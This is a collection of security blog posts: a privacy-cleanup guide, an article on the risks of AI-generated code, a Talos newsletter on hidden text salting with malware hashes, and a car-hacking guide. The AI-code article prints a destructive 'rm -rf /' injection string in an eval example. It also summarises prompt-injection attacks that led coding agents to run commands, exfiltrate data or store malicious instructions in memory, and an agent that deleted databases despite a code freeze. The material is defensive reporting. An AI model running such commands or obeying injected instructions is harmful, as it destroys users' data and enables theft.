While this cleanup of search results won’t actually remove the data from the original website, it will make the information significantly harder for the average person to find. If you need the actual data deleted, you must contact the owners of the websites where the information is posted. The service who.is can help here: it will show you whose name the domain is registered to. From there, it’s old-school OSINT: search for the site creator on social media, reach out privately, and try to negotiate a removal. If a friendly approach fails, you may need to use your country’s legal system as leverage.

Set up data breach notifications

Data leaks happen online virtually every day, exposing massive amounts of personal data: IP addresses, names, phone numbers, email addresses, payment info, and much more. Websites like Have I Been Pwned allow you to enter your email and get alerts if it shows up in a new leaked database.

However, for a comprehensive approach and greater convenience, it’s best to monitor leaks through Kaspersky Premium — we search for breaches using both email addresses and phone numbers. You can add all your email addresses and phone numbers (for yourself and your family) and be confident that we’ll warn you about a breach almost immediately, thanks to the Kaspersky Security Network (KSN) — our global threat intelligence infrastructure.

Unfortunately, preventing leaks single-handedly is an impossible task for the average user. So, the best defense is to limit how much personal data you share when registering new accounts.

Check internet archive services

Perhaps the most popular of these services is archive.org. Information you’ve deleted from other places might still be stored here, as the service takes snapshots of web pages and keeps them even after the original site is taken down.

Send an email to info@archive.org. Include the specific URL you want removed and specify the time period you wish to exclude from the archive. To ensure the data is deleted, explain your situation in detail. Clearly state that your personal data was posted without your consent.

Clean up your inbox

An email inbox overflowing with old messages that contain private information is also part of your digital footprint. Go through your mail using keywords like “password”, “SSN”, or “account”, and delete any emails containing this sensitive data. Unsubscribe from old mailing lists. This lowers the chance that your email address will leak from a marketer’s database. To safeguard the emails you need and to spot phishing attempts in time, use Kaspersky Premium.

Erase local traces

Don’t forget to regularly — at least once a month — clear your browser history, cookies, and cache on all your devices. Alternatively, set up your browser to clear this data automatically when you close it. This lessens the chance of an outsider collecting information from your device if they gain access to it.

On smartphones, you should disable or periodically reset your advertising identifier. Both Android and iOS privacy settings have options for this, which we discussed in detail in our post How smartphones build a dossier on you.

Review your privacy settings

If we were to break down all the privacy settings for every popular service, we’d need an entirely separate blog for that. Wait a second… we have one! The easiest way to check and adjust your privacy and security settings is through our free service, Privacy Checker. It will guide you on how to configure popular social platforms, services, and even operating systems to your desired level of privacy — ranging from the “Who cares about me?” mindset to the “Everyone is watching me” level.

Erase your nudes

If you find your intimate photos circulating online, or if an extortionist is threatening to share them with your contacts, don’t panic. Immediately reach out to StopNCII.org. And next time, only send intimate content to people you absolutely trust. Use secure messaging apps that offer an auto-delete feature for messages. When taking intimate photos, do so in a way that makes it impossible to identify you.

The “paranoid mode” bonus for the truly anxious

  • If you want to leave no trace on the internet whatsoever, be ready to go fully offline, or at least severely restrict your digital life. This means no social media under your real name, and an absolute minimum of online services — only the essentials. For details on how to safely restrict your gadget usage, check out our post Digital detox: How to take a safe break from screens.
  • Use messaging apps that feature end-to-end encryption and self-destructing messages. For search, use DuckDuckGo or Tor: that way your queries aren’t tied back to you. Ditch Gmail for encrypted email services that don’t require a phone number, like Temp Mail or Proton Mail. For smartphones, use a completely open OS that isn’t tied to Google/Apple (like GrapheneOS).
  • To leave minimal digital tracks, rely on virtual machines running Whonix or Tails OS.
  • If you know how to work with scripts, you can use them to fully purge your comments from social networks (see the sketch after this list). Open-source scripts exist for platforms like Discord, Reddit, and Telegram.
  • If you aren’t satisfied with half-measures, you can declare war on data brokers. These firms collect all available data about you to create a digital dossier, which they then sell. We detail who these brokers are and how to fight them in our post Why data brokers build dossiers on you, and how to stop them doing so.
  • Finally, create multiple online personas: this is a radical but effective way to confuse data collectors. Use different names, birth dates and emails for different spheres of your life. Invent a separate alter ego for professional activity (with a clean résumé and neutral posts), and another for personal communication. The less the internet can tie your various activities together, the better for your privacy.
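As an illustration of the Reddit case, here is a minimal sketch using the open-source PRAW library to overwrite and then delete your own comments; the credentials are placeholders, and Reddit’s rate limits mean a full purge can take a while:

```python
import praw  # pip install praw

# Placeholder credentials: create a "script" app at reddit.com/prefs/apps first.
reddit = praw.Reddit(
    client_id="YOUR_CLIENT_ID",
    client_secret="YOUR_CLIENT_SECRET",
    username="YOUR_USERNAME",
    password="YOUR_PASSWORD",
    user_agent="personal comment cleanup script",
)

# Iterate over your own comments, overwrite each one first (in case the
# original text is cached elsewhere), then delete it.
for comment in reddit.user.me().comments.new(limit=None):
    comment.edit(".")
    comment.delete()
    print("Removed comment", comment.id)
```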

Ready for a safer digital life? We have a few more useful tips for you:

Kaspersky official blog – ​Read More

Security risks of vibe coding and LLM assistants for developers

Although the benefits of AI assistants in the workplace remain debatable, where they’re being adopted most confidently of all is in software development. Here, LLMs play many roles — from refactoring and documentation, to building whole applications. However, traditional information security problems in development are now compounded by the unique vulnerabilities of AI models. At this intersection, new bugs and issues emerge almost weekly.

Vulnerable AI-generated code

When an LLM generates code, it may include bugs or security flaws. After all, these models are trained on publicly available data from the internet — including thousands of examples of low-quality code. A recent Veracode study found that leading AI models now produce code that compiles successfully 90% of the time. Less than two years ago, this figure was less than 20%. However, the security of that code has not improved — 45% still contains classic vulnerabilities from the OWASP Top-10 list, with little change in the last two years. The study covered over a hundred popular LLMs and code fragments in Java, Python, C#, and JavaScript. Thus, regardless of whether the LLM is used for “code completion” in Windsurf or “vibe coding” in Loveable, the final application must undergo thorough vulnerability testing. But in practice this rarely happens: according to a Wiz study, 20% of vibe-coded apps have serious vulnerabilities or configuration errors.

The women-only dating app Tea, which became notorious after two major data leaks, is often cited as an example of such flaws. However, this app predates vibe coding, and whether AI was to blame for Tea’s slip-up will be determined in court. In the case of the startup Enrichlead, though, AI was definitely the culprit. Its founder boasted on social media that 100% of his platform’s code was written by Cursor AI, with “zero hand-written code”. Just days after its launch, it was found to be full of newbie-level security flaws — allowing anyone to access paid features or alter data. The project was shut down after the founder failed to bring the code up to an acceptable security standard using Cursor. However, he remains undeterred and has since started new vibe-coding-based projects.

Common vulnerabilities in AI-generated code

Although AI-assisted programming has only existed for a year or two, there’s already enough data to identify its most common mistakes. Typically, these are:

  • Lack of input validation, no sanitization of user input from extraneous characters, and other basic errors leading to classic vulnerabilities such as cross-site scripting (XSS) and SQL injection.
  • API keys and other secrets hardcoded directly into the webpage, and visible to users in its code.
  • Authentication logic implemented entirely on the client side, directly in the site’s code running in the browser. This logic can be easily modified to bypass any checks.
  • Logging errors — from insufficient filtering when writing to logs, to a complete absence of logs.
  • Overly powerful and dangerous functions — AI models are optimized to output code that solves a task in the shortest way possible. But the shortest way is often insecure. A textbook example is using the eval function for mathematical operations on user input (a minimal illustration follows this list). This opens the door to arbitrary code execution in the generated application.
  • Outdated or non-existent dependencies. AI-generated code often references old versions of libraries, makes outdated or unsafe API calls, or even tries to import fictitious libraries. The latter is particularly dangerous because attackers can create a malicious library with a “plausible” name, and the AI agent will include it in a real project.
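A minimal illustration of the eval pitfall mentioned above, together with one safer alternative; the calculator scenario is hypothetical:

```python
import ast
import operator

# Insecure: eval() executes arbitrary Python, so input like
# "__import__('os').system('rm -rf /')" becomes remote code execution.
def calculate_unsafe(expression: str) -> float:
    return eval(expression)  # do not ship this

# Safer: parse the expression and allow only a small whitelist of arithmetic nodes.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}

def calculate_safe(expression: str) -> float:
    def _eval(node):
        if isinstance(node, ast.Expression):
            return _eval(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](_eval(node.left), _eval(node.right))
        raise ValueError("unsupported expression")
    return _eval(ast.parse(expression, mode="eval"))

print(calculate_safe("2 + 3 * 4"))  # 14
```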

In a systematic study, the authors scanned AI-generated code for weaknesses included in the MITRE CWE Top 25 list. The most common issues were CWE-94 (code injection), CWE-78 (OS command injection), CWE-190 (integer overflow), CWE-306 (missing authentication), and CWE-434 (unrestricted file upload).

A striking example of CWE-94 was the recent compromise of the Nx platform, which we covered previously. Attackers managed to trojanize a popular development tool by stealing a token enabling them to publish new product versions. The token theft exploited a vulnerability introduced by a simple AI-generated code fragment.

Dangerous prompts

The well-known saying among developers “done exactly according to the spec” also applies when working with an AI assistant. If the prompt for creating a function or application is vague and doesn’t mention security aspects, the likelihood of generating vulnerable code rises sharply. A dedicated study found that even general remarks like “make sure the code follows best practices for secure code” reduced the rate of vulnerabilities by half.

The most effective approach, however, is to use detailed, language-specific security guidance referencing MITRE or OWASP error lists. A large collection of such security instructions from Wiz Research is available on GitHub; it’s recommended to add them to AI assistants’ system prompts via files like claude.md, .windsurfrules, or similar.

Security degradation during revisions

When AI-generated code is repeatedly revised through follow-up prompts, its security deteriorates. A recent study had GPT-4o modify previously written code up to 40 times, with researchers scanning each version for vulnerabilities after every round. After only five iterations, the code contained 37% more critical vulnerabilities than the initial version. The study tested four prompting strategies: three with a different emphasis each (performance, security, and new functionality), while the fourth used deliberately vague prompts.

When prompts focused on adding new features, 158 vulnerabilities appeared — including 29 critical ones. When the prompt emphasized secure coding, the number dropped significantly — but still included 38 new vulnerabilities, seven of them critical.

Interestingly, the “security-focused” prompts resulted in the highest percentage of errors in cryptography-related functions.

Ignoring industry context

In sectors such as finance, healthcare, and logistics there are technical, organizational, and legal requirements that must be considered during app development. AI assistants are unaware of these constraints. This issue is often called “missing depth”. As a result, storage and processing methods for personal, medical, and financial data mandated by local or industry regulations won’t be reflected in AI-generated code. For example, an assistant might write a mathematically correct function for calculating deposit interest, but ignore rounding rules enforced by regulators. Healthcare data regulations often require detailed logging of every access attempt — something AI won’t automatically implement at the proper level of detail.
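As a hypothetical illustration of the rounding example: a regulator might mandate rounding half-up to the cent, while the code an assistant tends to produce silently relies on binary floats and banker's rounding. Python's decimal module makes the mandated rule explicit:

```python
from decimal import Decimal, ROUND_HALF_UP

amount = 2.675  # e.g. interest computed elsewhere, in dollars

# Typical AI-generated rounding: round() on a binary float. 2.675 is actually
# stored as 2.67499999..., so this prints 2.67 on most platforms.
print(round(amount, 2))

# Explicit, auditable rounding: exact decimal value plus a named rounding mode
# (ROUND_HALF_UP stands in for whatever the regulator actually mandates). Prints 2.68.
print(Decimal("2.675").quantize(Decimal("0.01"), rounding=ROUND_HALF_UP))
```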

Application misconfiguration

Vulnerabilities are not limited to the vibe code itself. Applications created through vibe coding are often built by inexperienced users, who either don’t configure the runtime environment at all, or configure it according to advice from the same AI. This leads to dangerous misconfigurations:

  • Databases required by the application are created with overly broad external access permissions. This results in leaks like Tea/Sapphos, where the attacker doesn’t even need to use the application to download or delete the entire database.
  • Internal corporate applications are left accessible to the public without authentication.
  • Applications are granted elevated permissions for access to critical databases. Combined with the vulnerabilities of AI-generated code, this simplifies SQL injections and similar attacks.

Platform vulnerabilities

Most vibe-coding platforms run applications generated from prompts directly on their own servers. This ties developers to the platform — including exposure to its vulnerabilities and dependence on its security practices. For example, in July a vulnerability was discovered in the Base44 platform that allowed unauthenticated attackers to access any private application.

Development-stage threats

The very presence of an assistant with broad access rights on the developer’s computer creates risks. Here are a few examples:

The CurXecute vulnerability (CVE-2025-54135) allowed attackers to order the popular AI development tool, Cursor, to execute arbitrary commands on the developer’s machine. All this needed was an active Model Context Protocol (MCP) server connected to Cursor, which an external party could use for access. This is a typical situation — MCP servers give AI agents access to Slack messages, Jira issues, and so on. Prompt injection can be performed through any of these channels.

The EscapeRoute vulnerability (CVE-2025-53109) allowed reading and writing of arbitrary files on the developer’s disk. The flaw existed in Anthropic’s popular MCP server, which lets AI agents write and read files in the system. The server’s access restrictions just didn’t work.

A malicious MCP server that let AI agents send and receive email via Postmark simultaneously forwarded all correspondence to a hidden address. We predicted the emergence of such malicious MCP servers back in September.

A vulnerability in the Gemini command-line interface allowed arbitrary command execution when a developer simply asked the AI assistant to analyze a new project’s code. The malicious injection was triggered from a readme.md file.

Amazon’s Q Developer extension for Visual Studio Code briefly contained instructions to wipe all data from a developer’s computer. An attacker exploited a mistake of Amazon’s developers, and managed to insert this malicious prompt into the assistant’s public code without special privileges. Fortunately, a small coding error prevented it from being executed.

A vulnerability in the Claude Code agent (CVE-2025-55284) allowed data to be exfiltrated from a developer’s computer through DNS requests. Prompt injection, which relied on common utilities that run automatically without confirmation, could be embedded in any code analyzed by the agent.

The autonomous AI agent Replit deleted the primary databases of a project it was developing because it decided the database required a cleanup. This violated a direct instruction prohibiting modifications (code freeze). Behind this unexpected AI behavior lies a key architectural flaw — at the time, Replit had no separation between test and production databases.

A prompt injection placed in a source code comment prompted the Windsurf development environment to automatically store malicious instructions in its long-term memory, allowing it to steal data from the system over months.

In the Nx compromise incident, command-line tools for Claude, Gemini, and Q were used to search for passwords and keys that could be stolen from an infected system.

How to use AI-generated code safely

The risk level from AI-generated code can be significantly, though not completely, reduced through a mix of organizational and technical measures:

  • Implement automatic reviewing of AI-generated code as it’s written using optimized SAST tools (a minimal example follows this list). 
  • Embed security requirements into the system prompts of all AI environments.
  • Have experienced human specialists perform detailed code reviews, supported by specialized AI-powered security analysis tools to increase effectiveness.
  • Train developers to write secure prompts and, more broadly, provide them with in-depth education on the secure use of AI.
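As one concrete option for the first point, the open-source Bandit scanner can be run over AI-generated Python before it is merged. This is a minimal sketch, and the severity gate is an arbitrary example:

```python
import json
import subprocess
import sys

def scan_with_bandit(path: str) -> list[dict]:
    """Run Bandit recursively over `path` and return its JSON findings."""
    proc = subprocess.run(
        ["bandit", "-r", path, "-f", "json"],
        capture_output=True, text=True,
    )
    return json.loads(proc.stdout).get("results", [])

if __name__ == "__main__":
    findings = scan_with_bandit(sys.argv[1] if len(sys.argv) > 1 else "src")
    # Arbitrary gate: block the merge on MEDIUM or HIGH severity findings.
    blockers = [f for f in findings if f["issue_severity"] in ("MEDIUM", "HIGH")]
    for f in blockers:
        print(f'{f["filename"]}:{f["line_number"]} {f["test_id"]} {f["issue_text"]}')
    sys.exit(1 if blockers else 0)  # non-zero exit fails the CI job or pre-commit hook
```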

Kaspersky official blog – ​Read More

Why don’t we sit around this computer console and have a sing-along?

Why don’t we sit around this computer console and have a sing-along?

Harnessing fire is one of mankind’s earliest technological advances. A controlled, tame fire offers us warmth, light and succulent cooked food. Yet, allow the controlled fire to burn too fiercely and it risks becoming an uncontained fire. The unexpected smell of smoke or the sight of tall flames provokes a deep fear within us and demands an instant response to contain and extinguish the fire, or to flee from its path.

We instinctively understand the benefits and dangers of fire. Through bitter experience we’ve learnt how to design and operate buildings to minimise the risks and maximise the survivability of fire. These lessons have become coded in rules and legislation which are often actively enforced and result in heavy sanctions for those who break them even before there is any evidence of a fire occurring.

In comparison, computer systems are a very recent technology. There are clear benefits to networked computer systems; we have come to rely on them to conduct many of the day-to-day tasks in our personal and professional lives. Yet, the dangers of computers are intangible. You can’t smell a software vulnerability or feel the burning heat of an active breach. Somehow their ethereal nature feels less pressing than the risk of fire, and may lead to complacency in addressing cyber threats.

The question of why we continue to experience cyber breaches despite having the technical know-how to prevent them is one that fascinates me. I’m intrigued by the differences in decision-making processes that lead to cyber risk either being prioritised or deprioritised within organisations. Indeed, so much so that this week I’m commencing a part-time doctorate to research this issue.

Frequently, cyber intelligence concentrates on the here and now, providing vital information to defend systems in the immediate term or near future. Threat intelligence must be timely. After all, it is better to have 80% of the intelligence in time than 100% too late. Yet, this rapid drum beat of needing to respond quickly can detract from the longer-term strategic intelligence issues of how the threat landscape is evolving and how we can improve our threat detection and response capabilities.

As a part-time student I have eight years to try and get a grip on how decisions in cyber security are made, and what makes a good decision. I’ll be certain to share my findings to help improve things, but don’t hold your breath; it will not be a fast process.

The one big thing

Cisco Talos has been closely monitoring the abuse of cascading style sheets (CSS) properties to include irrelevant content (or salt) in different parts of messages, a technique known as hidden text salting.

Why do I care?

There is widespread use of hidden text salting in malicious emails to bypass detection. Attackers embed hidden salt in the preheader, header, attachments and body — using characters, paragraphs and comments — by manipulating text, visibility and sizing properties. Talos has observed that hidden content is far more often found in spam and other email threats than in legitimate emails, posing a substantial challenge to both basic and advanced email defense solutions that leverage machine learning.

So now what? 

As explained with multiple examples, CSS provides a wide range of properties that can be abused by attackers to evade spam filters and detection engines. Therefore, two possible countermeasures are: first, to detect the presence of hidden text (or salt) in emails; and second, more importantly, to filter out the added salt before passing the message to downstream detection engines. 
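A very rough illustration of both countermeasures in Python using BeautifulSoup; the list of style properties treated as "hiding" is an assumption and far from exhaustive:

```python
import re
from bs4 import BeautifulSoup  # pip install beautifulsoup4

# Inline-style fragments commonly used to hide salt from the reader (assumed list).
HIDING_STYLES = [
    r"display\s*:\s*none",
    r"visibility\s*:\s*hidden",
    r"font-size\s*:\s*0",
    r"opacity\s*:\s*0(\.0+)?\b",
    r"(width|height|max-height)\s*:\s*0",
]

def strip_hidden_salt(html: str) -> tuple[str, int]:
    """Remove elements hidden via inline CSS and report how many were stripped."""
    soup = BeautifulSoup(html, "html.parser")
    hidden = [
        el for el in soup.find_all(True)
        if any(re.search(p, el.get("style") or "", re.IGNORECASE) for p in HIDING_STYLES)
    ]
    for el in hidden:
        if not getattr(el, "decomposed", False):  # skip elements already destroyed with a parent
            el.decompose()
    return str(soup), len(hidden)

if __name__ == "__main__":
    sample = '<p>Invoice attached.</p><span style="display:none">xkq zzv salt</span>'
    cleaned, count = strip_hidden_salt(sample)
    print(count, "hidden element(s) removed")
    print(cleaned)  # pass this cleaned body to downstream detection engines
```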

Top security headlines of the week

Physics Nobel Awarded to Three Scientists for Quantum Computing Breakthroughs
The 2025 Nobel Prize in Physics was awarded to three scientists for foundational work enabling quantum error correction — a cornerstone for stable, scalable quantum computers that could eventually undermine today’s encryption systems. (BBC)

Microsoft Defender Bug Triggers Erroneous BIOS Update Alerts
A bug in Microsoft Defender for Endpoint caused false vulnerability alerts related to Dell BIOS updates, leading to confusion among enterprise security teams. Microsoft confirmed the issue stems from a logic flaw in its vulnerability-fetching process. (Bleeping Computer)

Federal Government Acknowledges End of MS-ISAC Support
The U.S. federal government confirmed it will end funding for the Multi-State Information Sharing and Analysis Center (MS-ISAC), a program with a 20-year track record of helping state and local governments coordinate cybersecurity efforts. Advocates warn its loss will significantly weaken local cyber defense collaboration. (GovTech)

Can’t get enough Talos?

Footholds in Infrastructure: Defending Service Providers
Service providers sit at the heart of global connectivity… and the center of the threat landscape. In this short documentary, Cisco Talos explores the unique cybersecurity challenges faced by service providers.

Velociraptor leveraged in ransomware attacks
Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.

What to do when you click on a suspicious link
As the go-to cybersecurity expert for your friends and family, you’ll want to be ready for those “I clicked a suspicious link — now what?” messages. Share this quick guide to help them know exactly what to do next.

Talos Takes: You can’t patch burnout 
October is Cybersecurity Awareness Month, but what happens when the defenders themselves are overwhelmed? In this powerful episode, Hazel and Joe Marshall get real about why protecting your well-being is just as vital as any technical defense.

Upcoming events where you can find Talos 

Most prevalent malware files from Talos telemetry over the past week 

SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a
MD5: 1f7e01a3355b52cbc92c908a61abf643
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a
Example Filename: cleanup.bat
Detection Name: W32.D933EC4AAF-90.SBX.TG

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
MD5: 2915b3f8b703eb744fc54c81f4a9c67f
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_1_Exe.exe
Detection Name: Win.Worm.Coinminer::1201

SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974
MD5: aac3165ece2959f39ff98334618d10d9
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe
Detection Name: W32.Injector:Gen.21ie.1201

SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe
MD5: bf9672ec85283fdf002d83662f0b08b7
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe
Example Filename: f_00db3a.html
Detection Name: W32.C0AD494457-95.SBX.TG

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe_3_Exe.exe
Detection Name: Win.Dropper.Miner::95.sbx.tg

Cisco Talos Blog – ​Read More

How to protect your car from hacking | Kaspersky official blog

It’s been ten years since two researchers — Charlie Miller and Chris Valasek — terrified a Wired journalist (and then the whole world) with their remote hack of a Jeep Cherokee speeding down the highway. It played out like something straight out of a Stephen King novel — a possessed car gone rogue. The wipers started moving on their own, buttons stopped responding, the radio blasted uncontrollably, and the brake pedal went dead. We’ve covered that case in detail plenty before: here, here, and here.

Since then, cars have continued to evolve rapidly to integrate an ever-wider array of features. Digital electronics now control almost everything — from the engine and fuel systems to autopilot, passenger safety, and infotainment. That also means every interface or component can become a hacker’s entry point: MOST, LIN, and CAN buses, OBD ports, Ethernet, GPS, NFC, Wi-Fi, Bluetooth, LTE… But hey — on the bright side, the latest CarPlay lets you change your dashboard wallpaper!

Jokes aside, the most serious attacks no longer target individual vehicles, but rather their manufacturers’ servers. In 2024, for example, Toyota lost 240GB of data, including customer information and internal network details. A single compromised server can expose millions of vehicles at once.

Even the United Nations has taken note, and for once didn’t stop at “expressing concern”. Together with automakers, the UN has developed two key regulations — UN R155 and UN R156 — setting high-level cybersecurity and software update requirements for vehicle manufacturers. Also relevant is the ISO/SAE 21434:2021 standard, introduced in 2021, which details methods to mitigate cyber-risks throughout vehicle production. Though the above, technically, are recommendations, automakers have a strong incentive to comply: mass recalls can cost tens or even hundreds of millions of dollars. Case in point: following the incident mentioned earlier, Jeep had to recall 1.4 million vehicles in the U.S. alone — and faced a whopping $440 million in lawsuits.

Surprisingly, the UN’s efforts have had real impact. In the last two years, the strict new rules have already led to the discontinuation of several older models, simply because they were designed before the regulations came into force. The discontinued models in 2024 include the Porsche 718 Boxster and Cayman (July), Porsche Macan ICE (April), Audi R8 and TT (June), VW Up! and Transporter 6.1 (June), and Mercedes-Benz Smart EQ Fortwo (April).

What exactly can hackers do?

There are plenty of ways cybercriminals can cause trouble for drivers:

  • Creating dangerous situations. Disabling brakes, blasting loud music, or triggering other distractions (as in the Jeep case) can serve as psychological pressure or direct physical threats to anyone inside the vehicle.
  • Stealing telematics data. This can be used to launch a targeted attack on specific individuals. In 2024, millions of Kia vehicles were found vulnerable to remote tracking via a dealer portal. With just a license plate number, attackers could locate the car in real time, lock or unlock the doors, start or stop the engine, and even honk the horn. Similar issues have affected BMW, Mercedes, Ferrari, and other manufacturers. Researchers also discovered that by compromising smart alarm systems they could listen to what’s going on in the interior of the car, access vehicle history, and steal owners’ personal data.
  • Stealing the car itself. For example, by using devices such as CAN injectors, which connect to the vehicle’s CAN bus (through the headlight circuit, for example) and send commands that mimic signals from the real key.
  • Stealing payment data. You might wonder why a car would hold the owner’s credit card info. Well, it was needed to pay for BMW’s heated seat subscription, for example. But while that particular scheme was scrapped after a public backlash, the “everything-as-a-service” trend continues. For example, in 2023, Mercedes-Benz offered electric car drivers the option to pay extra for faster acceleration. The feature would shave 0.9 seconds off the 0–100km/h time for an annual fee of US$600–900!

How real is the threat to your car?

First, let’s determine which category your vehicle falls into. Kaspersky ICS-CERT experts roughly divide all cars into three groups:

Obsolete vehicles — no risk

Vehicles in this group have no interaction with external information systems via digital channels. Their control units are minimal, and the only interface (if any) is the diagnostic OBD port. They can’t be hacked remotely, and there are no known cases of cyberattacks against them — the only real threat is traditional theft. Even if you install a modern multimedia head unit or an emergency response system, those modules remain isolated from the car’s internal components, preventing any attack on critical systems.

Legacy vehicles — highest risk

These models sit between older cars with nothing to hack (“when cars were cars”, etc.) and today’s “computers on wheels” packed with sensors and interfaces. Most of their systems and controls are digital. They typically include a telematics unit for wireless connectivity, a powerful infotainment system, and intelligent driver-assistance features.

Together, these modules form a poorly protected information network where the ability to remotely adjust vehicle settings or control certain systems creates plenty of potential attack vectors. Owners often replace the outdated factory head units with new ones from third-party manufacturers — which rarely prioritize cybersecurity.

Such models are the most vulnerable to serious cyberattacks — including those that can endanger the driver’s or passengers’ lives. But no one is planning serious security updates for them anymore. That ill-fated Jeep mentioned earlier falls squarely into this category.

Modern vehicles — medium risk

The latest models take into account lessons learned from past mistakes, as well as newly developed standards and regulations. Manufacturers now use segmented network architectures with a central gateway that filters traffic to isolate critical systems from the components most exposed to attack — the infotainment and telecom modules.

Major automakers (General Motors was among the first, plus Tesla, Ford, Hyundai, BMW, Mercedes, Volkswagen, Toyota, Honda, and component makers like Bosch and Continental) now have dedicated cybersecurity teams and conduct penetration testing.

However, this doesn’t mean these cars are completely secure. Researchers regularly find new vulnerabilities even in the most advanced models, because their attack surface is far larger than that of older vehicles.

By the way, Kaspersky has developed its own car cybersecurity solution — Kaspersky Automotive Secure Gateway, so our top-tier protection will soon be available for vehicles too.

What to look out for when buying a car?

When buying a new vehicle these days, consider not only the technical specs but also its cybersecurity. Start by checking online for reports of cyberattacks on specific models or their manufacturers — such incidents rarely go unnoticed.

If possible, find information about the following:

  • The information network architecture of the car
  • The presence of a central security gateway
  • Separation of the car’s network into security domains
  • Support of CAN-message encryption

You should also ask the dealer the right questions:

  • What cybersecurity systems are built into the car?
  • How often are software updates released for this model, and how are they installed?
  • How can unused smart functions be disabled?

How do you set everything up correctly if you already have a car?

Start with the manufacturer’s mobile app (if one exists).

  • Set a strong, unique password that doesn’t contain any personal information. For help with this, see Creating an unforgettable password.
  • Strengthen your account security with two-factor authentication or passkeys, if available.
  • Regularly check the activity log and the list of devices connected to your account.
  • Disable any unused features in both the app and the car.

Next, tighten up the privacy settings in the car itself.

  • Turn off telemetry collection where possible.
  • Limit access to microphones and cameras.
  • Clear your travel history and saved contacts before selling the car.

And let’s not forget about managing connected devices.

  • Regularly review paired Bluetooth devices.
  • If possible, prohibit Bluetooth pairing without confirmation.
  • Remove connections to the devices of previous owners or passengers.
  • Disable automatic connection to unknown Wi-Fi networks.

A few final tips:

What to do if you suspect your car is hacked?

First, ask yourself: “What’s the evidence?” and check for the following signs of compromise:

  • Vehicle features unexpectedly turning on and off
  • Rapid battery drain with no obvious cause
  • Strange notifications in the vehicle’s mobile app
  • Inability to control the car normally

If you suspect a hack, do the following:

  • Disconnect the car from the internet. Remove the SIM card if possible, or contact your mobile operator to block data transfer for the number linked to the vehicle.
  • Change passwords for the car’s mobile app. If possible, terminate all sessions tied to your account (often an option in the settings), or review all connections and remove any unknown devices.
  • Take photos of any alerts the car displays.
  • If you’ve entered payment card details in the car, block the card immediately.
  • Contact an authorized dealer for diagnostics.
  • Contact the vehicle manufacturer’s support.
  • If you suspect data theft, report it to the police.

Note that for private owners, the most likely threats are tracking and theft. However, for organizations that operate fleets (taxis, car-sharing, transportation or construction equipment companies), the risks are significantly higher. For a deeper dive into current automotive cybersecurity trends, check out our report on the Kaspersky ICS CERT site.

Want to learn more about other threats to car owners? Browse our relevant posts:

Kaspersky official blog – ​Read More